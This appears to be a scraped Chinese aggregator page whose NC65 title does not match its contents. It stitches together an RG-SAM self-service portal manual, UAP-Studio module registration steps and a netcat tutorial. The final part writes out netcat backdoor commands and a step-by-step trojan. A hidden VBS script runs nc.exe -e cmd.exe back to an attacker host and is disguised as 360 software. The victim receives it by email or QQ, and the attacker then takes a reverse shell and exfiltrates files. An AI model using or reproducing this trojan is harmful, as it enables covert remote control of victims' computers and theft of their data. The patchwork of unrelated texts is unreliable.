NC65中“查询对象注册”功能在哪里?

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了NC65中“查询对象注册”功能在哪里?相关的知识,希望对你有一定的参考价值。

概述
用户自助模块是SAM系统的核心业务模块之一,其模块总体目标就是方便用户能自行完成账号申请,网络故障报修,查询消费记录,自助账号充值等功能,其受众对象主要是sam认证的客户群体。

从登录方式看, 自助服务有账号登录和匿名登录两种。匿名登录仅提供注册账号,故障保修和自助充值3项功能。而账号登录则能享受更多的自助服务,除了囊括匿名登录所能完成的所有自助服务外,使用账号登录的用户还可以查看上网明细和帐务流水,还能查询自身信息和修改密码等功能 。

下面, 我们就以账号登录的自助服务功能菜单为导向,逐个介绍每个菜单所能完成的功能。

账号登录的自助服务包含如下主菜单:首页,自助注册,网络保修,上网明细,帐务流水,自助开通,个人信息,卡服务,退出(匿名登录只包括 首页,自动注册,网络报修,卡服务和退出这几个菜单)

另外,这里要强调的是:

1. 匿名登录用户的可用权限可在管理端自助权限相应功能定制。

2.实名登录用户的可用权限也可以在管理端自助权限相应功能定值,并且实名登录用户的自助权限可以根据用户关联的自助权限不同而各不相同。

具体定制方法参考《RG-SAM 安全计费管理系统操作手册》。

访问自助服务
访问RG-SAM自助系统的完全地址是:http://[SAM服务器地址]:8080/selfservice/ 例:在你的IE地址框中敲入如下网址:http://192.168.1.1:8080/selfservice/ 自助系统登录页面如下图1-01所示

 

图1-01

自助服务的对象
在继续阅读下面的说明之前,请先对照如下条件判断,自己是否属于自助服务的对象:

1. 还不曾在sam上注册过,想自助进行注册以获取一个可以通过sam认证的帐号的用户

2. 已经提交了注册申请,但不知道审核结果想查询是否通过审核的用户

3. 注册信息初审不合格,被管理员驳回重填注册信息的用户

4. 想便捷的进行网络故障报修或者查看报修状态的用户

5. 想便捷的进行充值卡充值或对充值卡的状态进行查询的用户

6. 想查看自己的上网明细或帐务流水(消费记录)的用户

7. 想将自己待扣款注入自己帐户的周期性计费用户

8. 想查询自己或其他用户信息的用户

如果你符合上述8类用户中的任何一条,你就可以使用自助服务来便捷的完成你想达到的目的。

自助服务
用户注册
下面我们就来看看自助功能是如何满足第一类客户人群的:

譬如说你是新报道的学生,或是新员工,之前都没有一个可通过sam认证的帐号,或者说你已经有帐号了, 但希望再新注册一个新帐号,你都可以通过“自动注册”功能实现。

在登录界面选择“匿名登录”即可进入自助服务菜单 (对于新用户还没有注册自己的账号,因此不能使用账号来登录自助服务, 只能使用“匿名登录”这个特殊的方式来登录自助服务,一般来说,匿名服务能够实现的自助服务功能比实名登录要少一些,一般只能完成常规的自助注册,网络报修及卡服务这几个功能)。

匿名登录进来的界面如图1-02所示:



图1-02

根据你自身的实际情况填写如下注册信息(如图1-03),带“*”的信息是必填项。所填写的信息最好真实有效, 一旦管理员审核通过,便可正常使用该帐号,如图1-03:



图1-03

如果你注册的账号已经被别人注册过,那么你就只好另换一个账号注册了(譬如下图,你提交用户“hu”以后,再次用“hu”账号注册), 另外填写注册信息中出现格式不符合要求的地方,在提交时,系统都会红字提示你修改。如图1-04:



图1-04

填写完成后点击“保存”就可以提交,系统同时给出一个总览的页面,你如果想把这些注册信息保存下来已备日后查看,就可以通过保存网页的方式保存在PC上或通过“打印”按钮打印出来。如图1-05



图1-05

到此为止,你要做的事情就是等候SAM管理员的审批,审批通过后,你就获得了一个合法的认证账号,之后就可以通过此账号充值,上网了,当然,你再次用到自助服务时也不必“匿名登录” ,用此账号以实名登陆的方式进入自助服务将能完成更多的自助功能。

提交的注册信息可以通过SAM管理端的用户管理 注册用户审核看到,界面如下:如图1-06



图1-06

假设你提交了注册信息已经一段时间了(这段时间根据SAM管理员所需的实际审批时间而定),你可以通过自助注册 审核查询 来查询自己注册申请的账号是否已获通过。 如图,此时你仍旧可以通过“匿名登录”来打开这个菜单,或者通过任何一个已经注册过账号的亲朋好友的账号来实名登录,帮助自己查询自己申请的账号的状态。 如图1-07



图1-07

查询方法很简单,输入注册时的账号和密码,点击“查询”按钮即可,如图1-08



图1-08

如果你看到“审核通过”的字样,恭喜你,这表示你的账号已经可用了,SAM管理员在审核你账号的同时,会替你建立一个关联此账号的账户(一般来说,账号和账户同名),并为你制定好了上网如何收费的方法(详细参考管理手册的计费策略)。接下来你要做的就是给账户充值,账户内有足够的余额就可以畅游网络。

如果你看到的是“未审核” ,那么就表示SAM管理员还没来得及审核你的注册申请,那么你可能还得耐心等待一段时间。

如果你看到得是“审核未通过”,那么就表示你提交的注册信息或是别的什么原因导致SAM管理员不批准你的注册申请, 一般审核不通过的原因你可以看到。那就只能按照管理员的要求,重新注册一次,如图1-09:



图1-09

下面讲解如何进行注册信息的修改。仍旧“匿名登录”进入自助系统菜单自助注册 注册信息修改, 输入注册的账号和密码,点击“查询”按钮就进入了修改注册信息的界面,按管理员要求修改完注册信息,提交即可。接下来就是再次等管理员批准。如图1-10



图1-10

报修服务
如果你的网络出故障了,也就是我们第四类客户需要解决的问题: 如何报修和如何查询报修的状态

你此时可能上不了网,但一定能进入自助服务。一般匿名登录到自助服务就有“网络报修”的菜单,

网络报修 我要报修 填写报修信息, 如图1-11



图1-11

一段时间后,你可以通过网络报修 报修查询来查询问题处理的结果:填写你报修时的姓名或账户名,点击“查询”按钮,或者通过时间段查询,效果是一样的,如图1-12



图1-12

查询结果如图1-13



图1-13

如果管理员还没来的及处理,你将会看见处理状态是“未处理”。 否则,若被处理过,问题得以解决,那么处理状态会变成 “已处理”. 如图1-14



图1-14

当然, 你可以点击”查看”,查看详细情况,如图1-15



图1-15

上网明细
如果你很关心自己过去一段时间内的上网情况,你可以通过此菜单清晰的得出上网明细的结果。

简单来说, 上网明细就是提供给你查询你个人曾经的上网情况的。 由于可能涉及个人隐私,因此一般来说“匿名登录”将不会拥有此菜单,只有实名登录后, 才可能通过此菜单查询出登录账号历史上的上网状况。实名登录到自助服务,然后点击“上网明细”

系统提供了3种方式供用户查询明细:

1. 通过“使用服务”查询; 因为每一个账号在注册之初都会被SAM管理员关联好相应的服务,那么这里就可以根据你填入的服务名称来将相应的所有该服务的上网明细罗列出来

2. 通过“上下线时间”查询; 这个比较好理解, 查询结果就是你指定时间内上线或者下线的上网明细

3. 通过“在线时长”查询; 这个查询结果就是按照你在线时段的范围来查询明细

如果3个条件都填写了,那么查询结果将是3个查询条件结果的交集。下面分别举例说明。

譬如, 使用default服务的所有上网明细, 你可以如图,在使用服务栏填入“default”,如图1-16

点击“查询”后,就将该账户曾经使用“default”服务的所有上网记录都罗列了出来 。
参考技术A 模块注册

UAP-Studio新建业务组件项目时,自动注册到数据源

注册模块时,向导自动执行以下SQL脚本

insert into MD_MODULE (CREATETIME, CREATOR, DESCRIPTION, DISPLAYNAME, DR, HELP, ID, ISACTIVE, MODIFIER, MODIFYTIME, NAME, PARENTMODULEID, RESID, RESMODULE, TS, VERSIONTYPE)

values (null, null, null, ‘train’, 0, null, ‘train’, null, null, null, ‘train’, null, null, null, ‘2016-07-11 11:19:47’, 0);

功能注册

在功能注册节点注册相应的功能节点分类信息

功能注册节点位置:【功能注册】

注册一级模块:

模块编码/模块名称:自定义

模块号:自定义,长度为2

对应模块号:模块注册时的模块名称

注册二级模块:

模块编码/模块名称:自定义

模块号:自定义,长度为4

对应模块号:模块注册时的模块名称

增加功能分类:

通过增加功能分类按钮来增加虚功能节点

一级/二级功能模块为模块信息,存储在数据库表dap_dapsystem;其余节点注册信息存储在数据库表sm_funcregister

通过向导生成时,不需使用增加功能按钮,节点功能注册会在向导中生成

菜单注册

在菜单注册节点注册相应的功能节点界面显示信息

菜单注册节点位置:【菜单注册】

打开节点,双击表体项或点击菜单项进入菜单树

注册一级模块同级菜单,非功能节点菜单需勾选“是否虚菜单”

注册二级模块同级菜单,非功能节点菜单需勾选“是否虚菜单”

注册功能分类同级菜单,非功能节点菜单需勾选“是否虚菜单”

业务初始化

业务初始化:新建模块,需用帐套管理员登陆,在【业务初始化】处增补初始化,该模块下的功能节点才能被分配职责

nc语法和nc木马远程控制主机

nc语法和功能学习

  1. 基本使用

  • -l 监听 -p 端口

    例如:建立聊天通信功能

PC1:nc -l -p 4444 监听444端口 创建服务端

PC2:nc 172.16.20.2 4444 创建客户端

  • -e prog 程序重定向,一旦连接,就执行 [危险!!]

技术图片

实现客户端控制服务端cmd

  1. netcat文件传输

  • 使用场景

    技术图片

  • 文件传输使用方法

    1. 实现客户端向服务端传输文件

      • 创建服务端

      -nc -l -p 4444 > outfile(文件名)

      把监听4444端口的信息输出到outfile文件

      • 创建客户端(连接服务端)

      -nc 172.16.1.1 4444 <infile(文件路径)

      把infile文件发送到对应ip的端口

    2. 实现服务端向客户端传输文件

      • 创建服务端

      -nc -l -p 4444 <infile

      • 创建客户端(连接服务端)

      -nc 172.16.1.1 4444 >outfile

    注意:如果网络延迟大,客户端没有联机成功会造成假死,为避免这种情况,

    -nc -w3 172.16.1.1 4444 设置限制时间3s

  1. 信息探测

  • 使用场景

技术图片

  • 端口扫描方法

技术图片

所有端口扫描:-nc -v -n -z -w1 172.16.1.1 1-65535

  • Banner抓取方法

-nc -n -v -w1 172.16.1.1 1-1000

  1. 建立后门

  • 使用场景

技术图片

  • windows建立后门

    • 监听型后门:

      -nc -l -p 4444 -e cmd.exe 客户端控制服务端

    • 连接型后门:

      -nc 172.16.1.1 4444 -e cmd.exe 服务端控制客户端

  • linux建立后门

    • 监听型后门:

      -nc -l -p 4444 -e /bin/bash

    • 连接型后门:

      -nc 172.16.1.1 4444 -e /bin/bash

  1. 命令参数

技术图片

技术图片

技术图片

利用nc做小木马

1.原理

都知道nc有很多功能,其中最好玩的就是建立后门和文件传输。但是主机都有防火墙,未知的端口不得访问,所以我们就要让目标访问自己来绕过其防火墙,也就是自己做监听,目标做连接并返回cmd或者bash。

坑1:自己主机防火墙要开启对应端口,可局域网也可公网,公网远程攻击要自己搭一个服务器

坑2:目标主机可能没有nc,所以要在同目录加上nc程序(很小很小,所以为瑞士军刀)

2.简单实现

我用的是某云服务器,开放某某端口,

  • 制作vbs脚本
Set ws=CreateObject("Wscript.Shell")
ws.run "cmd /k cd ./bin&& .
c.exe -t -d -e cmd.exe x.x.x.x 3333 ",vbhide
WScript.Echo("Program repair succeeded!             ")
wscript.sleep 1500

主要功能cmd /k cd ./bin&& . c.exe -t -d -e cmd.exe x.x.x.x 3333

打开cmd并打开同目录下的bin文件夹,并且在此目录下执行 c.exe -t -d -e cmd.exe x.x.x.x 3333 命令,就是连接x.x.x.x 3333 端口

剩下两行都是用来伪装的,其他手段自行实施

结果

技术图片

  • 加壳转exe,伪装

我用的是vbs to exe

技术图片

可以上网搜.ico程序图标来伪装技术图片

结果图:

技术图片

我伪装成了360

接下来就是好玩得了

把我文件通过邮件、qq等途径发送

3.攻击过程

  • 连接

服务器安全组开启3333端口

服务器开始监听端口

技术图片

目标点击后

服务端会看到已经拿到目标主机的cmd

技术图片

  • 文件传输

服务器ssh在复制会话(xshell),端口对应的也要多开一个,就叫服务器2

技术图片

服务器2监听传输文件到outfile

技术图片

服务器1也就是那开始拿到目标shell的

技术图片

再回到服务器2就可以当前目录下有outfile文件,传输成功

总结

反正拿了shell,你想干嘛就干嘛,本过程只用了nc,也可以结合其他工具远程控制,自己想象,不过!!!重点来了,还有一个问题就是exe程序免杀!我还在学习,还请各路神仙指教。

以上只供学习思路参考,请勿非法利用,网络安全法在心中。

以上是关于NC65中“查询对象注册”功能在哪里?的主要内容,如果未能解决你的问题,请参考以下文章

nc65期初建账重分类

用友NC65怎么增加状态按钮

用友nc65怎么做采购订单退货

nc的用法

NC65搜索服务器搭建

NC65搜索服务器搭建